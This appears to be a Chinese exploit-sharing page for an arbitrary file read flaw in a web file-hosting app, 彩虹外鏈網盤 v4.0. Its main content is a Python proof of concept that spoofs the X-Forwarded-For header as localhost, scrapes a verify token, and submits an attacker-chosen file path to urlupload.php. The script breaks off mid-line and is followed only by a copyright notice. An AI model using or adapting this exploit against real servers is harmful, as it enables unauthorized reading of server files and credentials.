# 彩虹外鏈網盤 v4.0 任意文件讀取漏洞
==POC==
import requests
import re
import sys
url = sys.argv[1]
file = sys.argv[2]
headers={"X-Forwarded-For":"127.0.0.1"}
requests = requests.session()
html = requests.get(url+"/urlupload.php").text
verify = re.findall("name=\"verify\" value=\"(.*?)\"",html)[0]
data={"url":file,"name":"1231421312.torrent","pwd":"Aa1345123","verify":verify}
html = requests.post(url+"urlupload.php?a=1",data=data,headers=headers).text
try:
down_url = re.findall("
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容